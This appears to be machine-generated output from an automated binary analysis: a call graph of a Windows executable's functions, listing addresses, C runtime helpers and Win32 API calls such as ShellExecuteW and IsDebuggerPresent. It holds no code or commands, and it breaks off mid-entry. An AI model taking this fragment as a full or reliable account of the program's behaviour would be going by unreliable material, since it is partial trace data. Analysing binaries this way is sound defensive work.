416b49 __calloc_crt 46 API calls 76361->76369 76362 41acce SetHandleCount 76365 4164f7 76362->76365 76363 41ac7c GetFileType 76363->76366 76364 41abb4 76364->76366 76367 41abe0 GetFileType 76364->76367 76368 41abeb InitializeCriticalSectionAndSpinCount 76364->76368 76365->76314 76423 411924 46 API calls 3 library calls 76365->76423 76366->76360 76366->76362 76366->76363 76370 41aca2 InitializeCriticalSectionAndSpinCount 76366->76370 76367->76364 76367->76368 76368->76364 76368->76365 76369->76361 76369->76364 76369->76365 76369->76366 76370->76365 76370->76366 76372 41f595 76371->76372 76373 41f599 76371->76373 76372->76318 76373->76373 76448 416b04 76373->76448 76375 41f5bb _memmove 76376 41f5c2 FreeEnvironmentStringsW 76375->76376 76376->76318 76378 41f50b _wparse_cmdline 76377->76378 76379 416b04 __malloc_crt 46 API calls 76378->76379 76380 41f54e _wparse_cmdline 76378->76380 76379->76380 76380->76320 76382 41f2bc _wcslen 76381->76382 76386 41f2b4 76381->76386 76383 416b49 __calloc_crt 46 API calls 76382->76383 76388 41f2e0 _wcslen 76383->76388 76384 41f336 76455 413748 76384->76455 76386->76324 76387 416b49 __calloc_crt 46 API calls 76387->76388 76388->76384 76388->76386 76388->76387 76389 41f35c 76388->76389 76392 41f373 76388->76392 76454 41ef12 46 API calls __mbsnbicoll_l 76388->76454 76390 413748 _free 46 API calls 76389->76390 76390->76386 76461 417ed3 76392->76461 76394 41f37f 76394->76324 76396 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 76395->76396 76398 411750 __IsNonwritableInCurrentImage 76396->76398 76480 41130a 51 API calls __cinit 76396->76480 76398->76328 76400 42e2f3 76399->76400 76401 40d6cc 76399->76401 76402 408f40 VariantClear 76401->76402 76403 40d707 76402->76403 76481 40ebb0 76403->76481 76406 40d737 76484 411951 76406->76484 76411 40d751 76496 40f4e0 SystemParametersInfoW SystemParametersInfoW 76411->76496 76413 40d75f 76497 40d590 GetCurrentDirectoryW 76413->76497 76415 40d767 SystemParametersInfoW 76416 40d78d 76415->76416 76417 408f40 VariantClear 76416->76417 76418 40d79d 76417->76418 76419 408f40 VariantClear 76418->76419 76420 40d7a6 76419->76420 76420->76333 76427 4118da 46 API calls _doexit 76420->76427 76421->76306 76422->76310 76427->76333 76428->76336 76429->76344 76430->76352 76433 416b52 76431->76433 76434 416b8f 76433->76434 76435 416b70 Sleep 76433->76435 76439 41f677 76433->76439 76434->76350 76434->76355 76436 416b85 76435->76436 76436->76433 76436->76434 76437->76357 76438->76347 76440 41f683 76439->76440 76442 41f69e _malloc 76439->76442 76441 41f68f 76440->76441 76440->76442 76447 417f77 46 API calls __getptd_noexit 76441->76447 76443 41f6b1 HeapAlloc 76442->76443 76445 41f6d8 76442->76445 76443->76442 76443->76445 76445->76433 76446 41f694 76446->76433 76447->76446 76450 416b0d 76448->76450 76449 4135bb _malloc 45 API calls 76449->76450 76450->76449 76451 416b43 76450->76451 76452 416b24 Sleep 76450->76452 76451->76375 76453 416b39 76452->76453 76453->76450 76453->76451 76454->76388 76456 41377c _free 76455->76456 76457 413753 RtlFreeHeap 76455->76457 76456->76386 76457->76456 76458 413768 76457->76458 76464 417f77 46 API calls __getptd_noexit 76458->76464 76460 41376e GetLastError 76460->76456 76465 417daa 76461->76465 76464->76460 76466 417dc9 __gmtime64_s __call_reportfault 76465->76466 76467 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 76466->76467 76470 417eb5 __call_reportfault 76467->76470 76469 417ed1 GetCurrentProcess TerminateProcess 76469->76394 76471 41a208 76470->76471 76472 41a210 76471->76472 76473 41a212 IsDebuggerPresent 76471->76473 76472->76469 76479 41fe19 76473->76479 76476 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 76477 421ff8 GetCurrentProcess TerminateProcess 76476->76477 76478 421ff0 __call_reportfault 76476->76478 76477->76469 76478->76477 76479->76476 76480->76398 76537 40ebd0 76481->76537 76541 4182cb 76484->76541 76486 41195e 76548 4181f2 LeaveCriticalSection 76486->76548 76488 40d748 76489 4119b0 76488->76489 76490 4119d6 76489->76490 76491 4119bc 76489->76491 76490->76411 76491->76490 76583 417f77 46 API calls __getptd_noexit 76491->76583 76493 4119c6 76584 417f25 10 API calls __mbsnbicoll_l 76493->76584 76495 4119d1 76495->76411 76496->76413 76585 401f20 76497->76585 76499 40d5b6 IsDebuggerPresent 76500 40d5c4 76499->76500 76501 42e1bb MessageBoxA 76499->76501 76502 40d5e3 76500->76502 76503 42e1d4 76500->76503 76501->76503 76654 40f520 76502->76654 76757 403a50 52 API calls 3 library calls 76503->76757 76507 40d5fd GetFullPathNameW 76666 401460 76507->76666 76509 40d63b 76510 40d643 76509->76510 76511 42e231 SetCurrentDirectoryW 76509->76511 76512 40d64c 76510->76512 76758 432fee 6 API calls 76510->76758 76511->76510 76681 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 76512->76681 76515 42e252 76515->76512 76517 42e25a GetModuleFileNameW 76515->76517 76519 42e274 76517->76519 76520 42e2cb GetForegroundWindow ShellExecuteW 76517->76520 76759 401b10 76519->76759 76522 40d688 76520->76522 76521 40d656 76524 40d669 76521->76524 76755 40e0c0 74 API calls __gmtime64_s 76521->76755 76528 40d692 SetCurrentDirectoryW 76522->76528 76689 4091e0 76524->76689 76528->76415 76531 42e28d 76766 40d200 52 API calls 2 library calls 76531->76766 76534 42e299 GetForegroundWindow ShellExecuteW 76535 42e2c6 76534->76535 76535->76522 76536 40ec00 LoadLibraryA GetProcAddress 76536->76406 76538 40d72e 76537->76538 76539 40ebd6 LoadLibraryA 76537->76539 76538->76406 76538->76536 76539->76538 76540 40ebe7 GetProcAddress 76539->76540 76540->76538 76542 4182e0 76541->76542 76543 4182f3 EnterCriticalSection 76541->76543 76549 418209 76542->76549 76543->76486 76545 4182e6 76545->76543 76576 411924 46 API calls 3 library calls 76545->76576 76548->76488 76550 418215 __tzset_nolock 76549->76550 76551 418225 76550->76551 76552 41823d 76550->76552 76577 418901 46 API calls __NMSG_WRITE 76551->76577 76554 416b04 __malloc_crt 45 API calls 76552->76554 76564 41824b __tzset_nolock 76552->76564 76556 418256 76554->76556 76555 41822a 76578 418752 46 API calls 8 library calls 76555->76578 76558 41825d 76556->76558 76559 41826c 76556->76559 76580 417f77 46 API calls __getptd_noexit 76558->76580 76562 4182cb __lock 45 API calls 76559->76562 76560 418231 76579 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76560->76579 76565 418273 76562->76565 76564->76545 76567 4182a6 76565->76567 76568 41827b InitializeCriticalSectionAndSpinCount 76565->76568 76569 413748 _free 45 API calls 76567->76569 76570 418297 76568->76570 76571 41828b 76568->76571 76569->76570 76582 4182c2 LeaveCriticalSection _doexit 76570->76582 76572 413748 _free 45 API calls 76571->76572 76574 418291 76572->76574 76581 417f77 46 API calls __getptd_noexit 76574->76581 76577->76555 76578->76560 76580->76564 76581->76570 76582->76564 76583->76493 76584->76495 76767 40e6e0 76585->76767 76587 401f31 76588 401f41 GetModuleFileNameW 76587->76588 76770 410100 76588->76770 76590 401f5c 76782 410960 76590->76782 76593 401b10 52 API calls 76594 401f81 76593->76594 76595 401980 53 API calls 76594->76595 76596 401f8e 76595->76596 76597 408f40 VariantClear 76596->76597 76598 401f9d 76597->76598 76599 401b10 52 API calls 76598->76599 76600 401fb4 76599->76600 76601 401980 53 API calls 76600->76601 76602 401fc3 76601->76602 76603 401b10 52 API calls 76602->76603 76604 401fd2 76603->76604 76785 40c2c0 76604->76785 76606 401fe1 76607 40bc70 52 API calls 76606->76607 76608 401ff3 76607->76608 76803 401a10 76608->76803 76610 401ffe 76810 4114ab 76610->76810 76613 428b05 76615 401a10 52 API calls 76613->76615 76614 402017 76616 4114ab __wcsicoll 58 API calls 76614->76616 76617 428b18 76615->76617 76618 402022 76616->76618 76620 401a10 52 API calls 76617->76620 76618->76617 76619 40202d 76618->76619 76621 4114ab __wcsicoll 58 API calls 76619->76621 76622 428b33 76620->76622 76623 402038 76621->76623 76625 428b3b GetModuleFileNameW 76622->76625 76624 402043 76623->76624 76623->76625 76626 4114ab __wcsicoll 58 API calls 76624->76626 76627 401a10 52 API calls 76625->76627 76628 40204e 76626->76628 76629 428b6c 76627->76629 76632 428b90 _wcscpy 76628->76632 76633 401a10 52 API calls 76628->76633 76646 402092 76628->76646 76630 40e0a0 52 API calls 76629->76630 76631 428b7a 76630->76631 76634 401a10 52 API calls 76631->76634 76640 401a10 52 API calls 76632->76640 76637 402073 _wcscpy 76633->76637 76638 428b88 76634->76638 76635 428bc6 76636 4020a3 76636->76635 76639 40e830 53 API calls 76636->76639 76644 401a10 52 API calls 76637->76644 76638->76632 76641 4020bb 76639->76641 76649 4020d0 76640->76649 76818 40cf00 76641->76818 76643 4020c6 76645 408f40 VariantClear 76643->76645 76644->76646 76645->76649 76646->76632 76646->76636 76647 402110 76651 408f40 VariantClear 76647->76651 76648 40cf00 53 API calls 76648->76649 76649->76647 76649->76648 76652 401a10 52 API calls 76649->76652 76831 40e6a0 53 API calls 76649->76831 76653 402120 moneypunct 76651->76653 76652->76649 76653->76499 76655 4295c9 __gmtime64_s 76654->76655 76656 40f53c 76654->76656 76658 4295d9 GetOpenFileNameW 76655->76658 77570 410120 76656->77570 76658->76656 76660 40d5f5 76658->76660 76659 40f545 77574 4102b0 SHGetMalloc 76659->77574 76660->76507 76660->76509 76662 40f54c 77579 410190 GetFullPathNameW 76662->77579 76664 40f559 77590 40f570 76664->77590 77632 402400 76666->77632 76668 40146f 76671 428c29 _wcscat 76668->76671 77641 401500 76668->77641 76670 40147c 76670->76671 77649 40d440 76670->77649 76673 401489 76673->76671 76674 401491 GetFullPathNameW 76673->76674 76675 402160 52 API calls 76674->76675 76676 4014bb 76675->76676 76677 402160 52 API calls 76676->76677 76678 4014c8 76677->76678 76678->76671 76679 402160 52 API calls 76678->76679 76680 4014ee 76679->76680 76680->76509 76682 428361 76681->76682 76683 4103fc LoadImageW RegisterClassExW 76681->76683 77726 44395e EnumResourceNamesW LoadImageW 76682->77726 77725 410490 7 API calls 76683->77725 76686 40d651 76688 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 76686->76688 76687 428368 76688->76521 76690 409202 76689->76690 76691 42d7ad 76689->76691 76749 409216 moneypunct 76690->76749 77989 410940 398 API calls 76690->77989 77992 45e737 90 API calls 3 library calls 76691->77992 76694 409386 76695 40939c 76694->76695 77990 40f190 10 API calls 76694->77990 76695->76522 76756 401000 Shell_NotifyIconW __gmtime64_s 76695->76756 76697 4095b2 76697->76695 76699 4095bf 76697->76699 76698 409253 PeekMessageW 76698->76749 77991 401a50 398 API calls 76699->77991 76701 42d8cd Sleep 76701->76749 76702 4095c6 LockWindowUpdate DestroyWindow GetMessageW 76702->76695 76705 4095f9 76702->76705 76704 42e13b 78010 40d410 VariantClear 76704->78010 76708 42e158 TranslateMessage DispatchMessageW GetMessageW 76705->76708 76708->76708 76710 42e188 76708->76710 76709 409567 PeekMessageW 76709->76749 76710->76695 76713 44c29d 52 API calls 76754 4094e0 76713->76754 76714 46f3c1 107 API calls 76714->76749 76715 40e0a0 52 API calls 76715->76749 76716 46fdbf 108 API calls 76716->76754 76717 409551 TranslateMessage DispatchMessageW 76717->76709 76719 42dcd2 WaitForSingleObject 76722 42dcf0 GetExitCodeProcess CloseHandle 76719->76722 76719->76749 76720 42dd3d Sleep 76720->76754 76721 47d33e 376 API calls 76721->76749 77999 40d410 VariantClear 76722->77999 76726 4094cf Sleep 76726->76754 76727 42d94d timeGetTime 77995 465124 53 API calls 76727->77995 76729 40d410 VariantClear 76729->76749 76730 408f40 VariantClear 76730->76754 76733 40c620 timeGetTime 76733->76754 76734 465124 53 API calls 76734->76754 76736 42dd89 CloseHandle 76736->76754 76738 42de19 GetExitCodeProcess CloseHandle 76738->76754 76739 401b10 52 API calls 76739->76754 76742 42de88 Sleep 76742->76749 76745 401980 53 API calls 76745->76754 76746 45e737 90 API calls 76746->76749 76749->76694 76749->76698 76749->76701 76749->76704 76749->76709 76749->76714 76749->76715 76749->76717 76749->76719 76749->76720 76749->76721 76749->76726 76749->76727 76749->76729 76749->76746 76750 42e0cc VariantClear 76749->76750 76751 408f40 VariantClear 76749->76751 76749->76754 77727 4091b0 76749->77727 77785 40afa0 76749->77785 77811 408fc0 76749->77811 77846 408cc0 76749->77846 77860 4096a0 76749->77860 77987 40d150 TranslateAcceleratorW 76749->77987 77988 40d170 IsDialogMessageW GetClassLongW 76749->77988 77993 465124 53 API calls 76749->77993 77994 40c620 timeGetTime 76749->77994 78009 40e270 VariantClear moneypunct 76749->78009 76750->76749 76751->76749 76754->76713 76754->76716 76754->76730 76754->76733 76754->76734 76754->76736 76754->76738 76754->76739 76754->76742 76754->76745 76754->76749 77996 45178a 54 API calls 76754->77996 77997 47d33e 398 API calls 76754->77997 77998 453bc6 54 API calls 76754->77998 78000 40d410 VariantClear 76754->78000 78001 443d19 67 API calls _wcslen 76754->78001 78002 4574b4 VariantClear 76754->78002 78003 403cd0 76754->78003 78007 4731e1 VariantClear 76754->78007 78008 4331a2 6 API calls 76754->78008 76755->76524 76756->76522 76757->76509 76758->76515 76760 401b16 _wcslen 76759->76760 76761 4115d7 52 API calls 76760->76761 76764 401b63 76760->76764 76762 401b4b _memmove 76761->76762 76763 4115d7 52 API calls 76762->76763 76763->76764 76765 40d200 52 API calls 2 library calls 76764->76765 76765->76531 76766->76534 76768 40bc70 52 API calls 76767->76768 76769 40e6ee 76768->76769 76769->76587 76832 40f760 76770->76832 76773 410118 76773->76590 76775 42805d 76776 42806a 76775->76776 76888 431e58 76775->76888 76778 413748 _free 46 API calls 76776->76778 76779 428078 76778->76779 76780 431e58 82 API calls 76779->76780 76781 428084 76780->76781 76781->76590 76783 4115d7 52 API calls 76782->76783 76784 401f74 76783->76784 76784->76593 76786 40c2c7 76785->76786 76787 40c30e 76785->76787 76790 40c2d3 76786->76790 76791 426c79 76786->76791 76788 40c315 76787->76788 76789 426c2b 76787->76789 76792 40c321 76788->76792 76793 426c5a 76788->76793 76795 426c4b 76789->76795 76796 426c2e 76789->76796 77557 403ea0 52 API calls __cinit 76790->77557 77562 4534e3 52 API calls 76791->77562 77558 403ea0 52 API calls __cinit 76792->77558 77561 4534e3 52 API calls 76793->77561 77560 4534e3 52 API calls 76795->77560 76802 40c2de 76796->76802 77559 4534e3 52 API calls 76796->77559 76802->76606 76804 401a30 76803->76804 76805 401a17 76803->76805 76807 402160 52 API calls 76804->76807 76806 401a2d 76805->76806 77563 403c30 52 API calls _memmove 76805->77563 76806->76610 76809 401a3d 76807->76809 76809->76610 76811 411523 76810->76811 76812 4114ba 76810->76812 77566 4113a8 58 API calls 3 library calls 76811->77566 76817 40200c 76812->76817 77564 417f77 46 API calls __getptd_noexit 76812->77564 76815 4114c6 77565 417f25 10 API calls __mbsnbicoll_l 76815->77565 76817->76613 76817->76614 76819 428ac6 76818->76819 76820 40cf0e 76818->76820 76819->76643 76821 40cf19 76820->76821 77567 40e810 52 API calls 76820->77567 76824 40cf1d 76821->76824 77569 40e950 53 API calls 76821->77569 76825 40cf38 76824->76825 76826 4115d7 52 API calls 76824->76826 76825->76643 76827 40cf88 76826->76827 76828 40cfaa 76827->76828 77568 40d290 52 API calls 76827->77568 76828->76643 76830 40cf96 76830->76643 76831->76649 76892 40f6f0 76832->76892 76834 40f77b _strcat moneypunct 76900 40f850 76834->76900 76839 427c2a 76929 414d04 76839->76929 76841 40f7fc 76841->76839 76842 40f804 76841->76842 76916 414a46 76842->76916 76846 40f80e 76846->76773 76851 4528bd 76846->76851 76848 427c59 76935 414fe2 76848->76935 76850 427c79 76852 4150d1 _fseek 81 API calls 76851->76852 76853 452930 76852->76853 77459 452719 76853->77459 76856 452948 76856->76775 76857 414d04 __fread_nolock 61 API calls 76858 452966 76857->76858 76859 414d04 __fread_nolock 61 API calls 76858->76859 76860 452976 76859->76860 76861 414d04 __fread_nolock 61 API calls 76860->76861 76862 45298f 76861->76862 76863 414d04 __fread_nolock 61 API calls 76862->76863 76864 4529aa 76863->76864 76865 4150d1 _fseek 81 API calls 76864->76865 76866 4529c4 76865->76866 76867 4135bb _malloc 46 API calls 76866->76867 76868 4529cf 76867->76868 76869 4135bb _malloc 46 API calls 76868->76869 76870 4529db 76869->76870 76871 414d04 __fread_nolock 61 API calls 76870->76871 76872 4529ec 76871->76872 76873 44afef GetSystemTimeAsFileTime 76872->76873 76874 452a00 76873->76874 76875 452a36 76874->76875 76876 452a13 76874->76876 76878 452aa5 76875->76878 76879 452a3c 76875->76879 76877 413748 _free 46 API calls 76876->76877 76881 452a1c 76877->76881 76880 413748 _free 46 API calls 76878->76880 77465 44b1a9 76879->77465 76887 452aa3 76880->76887 76883 413748 _free 46 API calls 76881->76883 76885 452a25 76883->76885 76884 452a9d 76886 413748 _free 46 API calls 76884->76886 76885->76775 76886->76887 76887->76775 76889 431e64 76888->76889 76890 431e6a 76888->76890 76891 414a46 __fcloseall 82 API calls 76889->76891 76890->76776 76891->76890 76893 425de2 76892->76893 76894 40f6fc _wcslen 76892->76894 76893->76834 76895 40f710 WideCharToMultiByte 76894->76895 76896 40f756 76895->76896 76897 40f728 76895->76897 76896->76834 76898 4115d7 52 API calls 76897->76898 76899 40f735 WideCharToMultiByte 76898->76899 76899->76834 76902 40f85d __gmtime64_s _strlen 76900->76902 76903 40f7ab 76902->76903 76948 414db8 76902->76948 76904 4149c2 76903->76904 76963 414904 76904->76963 76906 40f7e9 76906->76839 76907 40f5c0 76906->76907 76911 40f5cd _strcat __write_nolock _memmove 76907->76911 76908 414d04 __fread_nolock 61 API calls 76908->76911 76909 40f691 __tzset_nolock 76909->76841 76911->76908 76911->76909 76914 425d11 76911->76914 77051 4150d1 76911->77051 76912 4150d1 _fseek 81 API calls 76913 425d33 76912->76913 76915 414d04 __fread_nolock 61 API calls 76913->76915 76914->76912 76915->76909 76917 414a52 __tzset_nolock 76916->76917 76918 414a64 76917->76918 76919 414a79 76917->76919 77215 417f77 46 API calls __getptd_noexit 76918->77215 76921 415471 __lock_file 47 API calls 76919->76921 76925 414a74 __tzset_nolock 76919->76925 76923 414a92 76921->76923 76922 414a69 77216 417f25 10 API calls __mbsnbicoll_l 76922->77216 77199 4149d9 76923->77199 76925->76846 77284 414c76 76929->77284 76931 414d1c 76932 44afef 76931->76932 77452 442c5a 76932->77452 76934 44b00d 76934->76848 76936 414fee __tzset_nolock 76935->76936 76937 414ffa 76936->76937 76938 41500f 76936->76938 77456 417f77 46 API calls __getptd_noexit 76937->77456 76940 415471 __lock_file 47 API calls 76938->76940 76941 415017 76940->76941 76943 414e4e __ftell_nolock 51 API calls 76941->76943 76942 414fff 77457 417f25 10 API calls __mbsnbicoll_l 76942->77457 76945 415024 76943->76945 77458 41503d LeaveCriticalSection LeaveCriticalSection _fseek 76945->77458 76947 41500a __tzset_nolock 76947->76850 76949 414dd6 76948->76949 76950 414deb 76948->76950 76959 417f77 46 API calls __getptd_noexit 76949->76959 76950->76949 76951 414df2 76950->76951 76961 41b91b 79 API calls 12 library calls 76951->76961 76954 414ddb 76960 417f25 10 API calls __mbsnbicoll_l 76954->76960 76956 414e18 76957 414de6 76956->76957 76962 418f98 77 API calls 7 library calls 76956->76962 76957->76902 76959->76954 76960->76957 76961->76956 76962->76957 76966 414910 __tzset_nolock 76963->76966 76964 414923 77019 417f77 46 API calls __getptd_noexit 76964->77019 76966->76964 76968 414951 76966->76968 76967 414928 77020 417f25 10 API calls __mbsnbicoll_l 76967->77020 76982 41d4d1 76968->76982 76971 414956 76972 41496a 76971->76972 76973 41495d 76971->76973 76975 414992 76972->76975 76976 414972 76972->76976 77021 417f77 46 API calls __getptd_noexit 76973->77021 76999 41d218 76975->76999 77022 417f77 46 API calls __getptd_noexit 76976->77022 76977 414933 __tzset_nolock @_EH4_CallFilterFunc@8 76977->76906 76983 41d4dd __tzset_nolock 76982->76983 76984 4182cb __lock 46 API calls 76983->76984 76996 41d4eb 76984->76996 76985 41d560 77024 41d5fb 76985->77024 76986 41d567 76988 416b04 __malloc_crt 46 API calls 76986->76988 76990 41d56e 76988->76990 76989 41d5f0 __tzset_nolock 76989->76971 76990->76985 76991 41d57c InitializeCriticalSectionAndSpinCount 76990->76991 76993 41d59c 76991->76993 76994 41d5af EnterCriticalSection 76991->76994 76997 413748 _free 46 API calls 76993->76997 76994->76985 76995 418209 __mtinitlocknum 46 API calls 76995->76996 76996->76985 76996->76986 76996->76995 77027 4154b2 47 API calls __lock 76996->77027 77028 415520 LeaveCriticalSection LeaveCriticalSection _doexit 76996->77028 76997->76985 77000 41d23a 76999->77000 77001 41d255 77000->77001 77013 41d26c __wopenfile 77000->77013 77033 417f77 46 API calls __getptd_noexit 77001->77033 77002 41d421 77005 41d47a 77002->77005 77006 41d48c 77002->77006 77004 41d25a 77034 417f25 10 API calls __mbsnbicoll_l 77004->77034 77038 417f77 46 API calls __getptd_noexit 77005->77038 77030 422bf9 77006->77030 77010 41d47f 77039 417f25 10 API calls __mbsnbicoll_l 77010->77039 77011 41499d 77023 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 77011->77023 77013->77002 77013->77005 77035 41341f 58 API calls 2 library calls 77013->77035 77015 41d41a 77015->77002 77036 41341f 58 API calls 2 library calls 77015->77036 77017 41d439 77017->77002 77037 41341f 58 API calls 2 library calls 77017->77037 77019->76967 77020->76977 77021->76977 77022->76977 77023->76977 77029 4181f2 LeaveCriticalSection 77024->77029 77026 41d602 77026->76989 77027->76996 77028->76996 77029->77026 77040 422b35 77030->77040 77032 422c14 77032->77011 77033->77004 77034->77011 77035->77015 77036->77017 77037->77002 77038->77010 77039->77011 77041 422b41 __tzset_nolock 77040->77041 77042 422b54 77041->77042 77044 422b8a 77041->77044 77043 417f77 __mbsnbicoll_l 46 API calls 77042->77043 77045 422b59 77043->77045 77046 422400 __tsopen_nolock 109 API calls 77044->77046 77047 417f25 __mbsnbicoll_l 10 API calls 77045->77047 77048 422ba4 77046->77048 77050 422b63 __tzset_nolock 77047->77050 77049 422bcb __wsopen_helper LeaveCriticalSection 77048->77049 77049->77050 77050->77032 77053 4150dd __tzset_nolock 77051->77053 77052 4150e9 77082 417f77 46 API calls __getptd_noexit 77052->77082 77053->77052 77054 41510f 77053->77054 77064 415471 77054->77064 77057 4150ee 77083 417f25 10 API calls __mbsnbicoll_l 77057->77083 77063 4150f9 __tzset_nolock 77063->76911 77065 415483 77064->77065 77066 4154a5 EnterCriticalSection 77064->77066 77065->77066 77068 41548b 77065->77068 77067 415117 77066->77067 77070 415047 77067->77070 77069 4182cb __lock 46 API calls 77068->77069 77069->77067 77071 415067 77070->77071 77072 415057 77070->77072 77077 415079 77071->77077 77085 414e4e 77071->77085 77140 417f77 46 API calls __getptd_noexit 77072->77140 77076 41505c 77084 415143 LeaveCriticalSection LeaveCriticalSection _fseek 77076->77084 77102 41443c 77077->77102 77080 4150b9 77115 41e1f4 77080->77115 77082->77057 77083->77063 77084->77063 77086 414e61 77085->77086 77087 414e79 77085->77087 77141 417f77 46 API calls __getptd_noexit 77086->77141 77089 414139 __fclose_nolock 46 API calls 77087->77089 77091 414e80 77089->77091 77090 414e66 77142 417f25 10 API calls __mbsnbicoll_l 77090->77142 77093 41e1f4 __write 51 API calls 77091->77093 77094 414e97 77093->77094 77095 414f09 77094->77095 77097 414ec9 77094->77097 77101 414e71 77094->77101 77143 417f77 46 API calls __getptd_noexit 77095->77143 77098 41e1f4 __write 51 API calls 77097->77098 77097->77101 77099 414f64 77098->77099 77100 41e1f4 __write 51 API calls 77099->77100 77099->77101 77100->77101 77101->77077 77103 414455 77102->77103 77107 414477 77102->77107 77104 414139 __fclose_nolock 46 API calls 77103->77104 77103->77107 77105 414470 77104->77105 77144 41b7b2 77105->77144 77108 414139 77107->77108 77109 414145 77108->77109 77110 41415a 77108->77110 77169 417f77 46 API calls __getptd_noexit 77109->77169 77110->77080 77112 41414a 77170 417f25 10 API calls __mbsnbicoll_l 77112->77170 77114 414155 77114->77080 77116 41e200 __tzset_nolock 77115->77116 77117 41e223 77116->77117 77118 41e208 77116->77118 77119 41e22f 77117->77119 77125 41e269 77117->77125 77191 417f8a 46 API calls __getptd_noexit 77118->77191 77193 417f8a 46 API calls __getptd_noexit 77119->77193 77121 41e20d 77192 417f77 46 API calls __getptd_noexit 77121->77192 77124 41e234 77194 417f77 46 API calls __getptd_noexit 77124->77194 77171 41ae56 77125->77171 77128 41e26f 77130 41e291 77128->77130 77131 41e27d 77128->77131 77129 41e23c 77195 417f25 10 API calls __mbsnbicoll_l 77129->77195 77196 417f77 46 API calls __getptd_noexit 77130->77196 77181 41e17f 77131->77181 77135 41e215 __tzset_nolock 77135->77076 77136 41e289 77198 41e2c0 LeaveCriticalSection __unlock_fhandle 77136->77198 77137 41e296 77197 417f8a 46 API calls __getptd_noexit 77137->77197 77140->77076 77141->77090 77142->77101 77143->77101 77145 41b7be __tzset_nolock 77144->77145 77146 41b7e1 77145->77146 77147 41b7c6 77145->77147 77149 41b7ed 77146->77149 77153 41b827 77146->77153 77148 417f8a __write_nolock 46 API calls 77147->77148 77151 41b7cb 77148->77151 77150 417f8a __write_nolock 46 API calls 77149->77150 77152 41b7f2 77150->77152 77154 417f77 __mbsnbicoll_l 46 API calls 77151->77154 77155 417f77 __mbsnbicoll_l 46 API calls 77152->77155 77156 41ae56 ___lock_fhandle 48 API calls 77153->77156 77162 41b7d3 __tzset_nolock 77154->77162 77157 41b7fa 77155->77157 77158 41b82d 77156->77158 77159 417f25 __mbsnbicoll_l 10 API calls 77157->77159 77160 41b83b 77158->77160 77161 41b84f 77158->77161 77159->77162 77163 41b0b5 __write_nolock 74 API calls 77160->77163 77164 417f77 __mbsnbicoll_l 46 API calls 77161->77164 77162->77107 77166 41b847 77163->77166 77165 41b854 77164->77165 77167 417f8a __write_nolock 46 API calls 77165->77167 77168 41b87e __write LeaveCriticalSection 77166->77168 77167->77166 77168->77162 77169->77112 77170->77114 77172 41ae62 __tzset_nolock 77171->77172 77173 41aebc 77172->77173 77174 4182cb __lock 46 API calls 77172->77174 77175 41aec1 EnterCriticalSection 77173->77175 77176 41aede __tzset_nolock 77173->77176 77177 41ae8e 77174->77177 77175->77176 77176->77128 77178 41ae97 InitializeCriticalSectionAndSpinCount 77177->77178 77179 41aeaa 77177->77179 77178->77179 77180 41aeec ___lock_fhandle LeaveCriticalSection 77179->77180 77180->77173 77182 41aded __lseeki64_nolock 46 API calls 77181->77182 77183 41e18e 77182->77183 77184 41e1a4 SetFilePointer 77183->77184 77185 41e194 77183->77185 77187 41e1c3 77184->77187 77188 41e1bb GetLastError 77184->77188 77186 417f77 __mbsnbicoll_l 46 API calls 77185->77186 77190 41e199 77186->77190 77189 417f9d __dosmaperr 46 API calls 77187->77189 77187->77190 77188->77187 77189->77190 77190->77136 77191->77121 77192->77135 77193->77124 77194->77129 77195->77135 77196->77137 77197->77136 77198->77135 77200 4149ea 77199->77200 77201 4149fe 77199->77201 77245 417f77 46 API calls __getptd_noexit 77200->77245 77203 41443c __flush 77 API calls 77201->77203 77207 4149fa 77201->77207 77205 414a0a 77203->77205 77204 4149ef 77246 417f25 10 API calls __mbsnbicoll_l 77204->77246 77218 41d8c2 77205->77218 77217 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 77207->77217 77210 414139 __fclose_nolock 46 API calls 77211 414a18 77210->77211 77222 41d7fe 77211->77222 77213 414a1e 77213->77207 77214 413748 _free 46 API calls 77213->77214 77214->77207 77215->76922 77216->76925 77217->76925 77219 414a12 77218->77219 77220 41d8d2 77218->77220 77219->77210 77220->77219 77221 413748 _free 46 API calls 77220->77221 77221->77219 77223 41d80a __tzset_nolock 77222->77223 77224 41d812 77223->77224 77225 41d82d 77223->77225 77262 417f8a 46 API calls __getptd_noexit 77224->77262 77227 41d839 77225->77227 77231 41d873 77225->77231 77264 417f8a 46 API calls __getptd_noexit 77227->77264 77228 41d817 77263 417f77 46 API calls __getptd_noexit 77228->77263 77230 41d83e 77265 417f77 46 API calls __getptd_noexit 77230->77265 77234 41ae56 ___lock_fhandle 48 API calls 77231->77234 77236 41d879 77234->77236 77235 41d846 77266 417f25 10 API calls __mbsnbicoll_l 77235->77266 77238 41d893 77236->77238 77239 41d887 77236->77239 77267 417f77 46 API calls __getptd_noexit 77238->77267 77247 41d762 77239->77247 77240 41d81f __tzset_nolock 77240->77213 77243 41d88d 77268 41d8ba LeaveCriticalSection __unlock_fhandle 77243->77268 77245->77204 77246->77207 77269 41aded 77247->77269 77249 41d7c8 77282 41ad67 47 API calls 2 library calls 77249->77282 77251 41d772 77251->77249 77252 41d7a6 77251->77252 77255 41aded __lseeki64_nolock 46 API calls 77251->77255 77252->77249 77253 41aded __lseeki64_nolock 46 API calls 77252->77253 77256 41d7b2 CloseHandle 77253->77256 77254 41d7d0 77257 41d7f2 77254->77257 77283 417f9d 46 API calls 3 library calls 77254->77283 77258 41d79d 77255->77258 77256->77249 77260 41d7be GetLastError 77256->77260 77257->77243 77259 41aded __lseeki64_nolock 46 API calls 77258->77259 77259->77252 77260->77249 77262->77228 77263->77240 77264->77230 77265->77235 77266->77240 77267->77243 77268->77240 77270 41adfa 77269->77270 77272 41ae12 77269->77272 77271 417f8a __write_nolock 46 API calls 77270->77271 77273 41adff 77271->77273 77274 417f8a __write_nolock 46 API calls 77272->77274 77275 41ae51 77272->77275 77276 417f77 __mbsnbicoll_l 46 API calls 77273->77276 77277 41ae23 77274->77277 77275->77251 77278 41ae07 77276->77278 77279 417f77 __mbsnbicoll_l 46 API calls 77277->77279 77278->77251 77280 41ae2b 77279->77280 77281 417f25 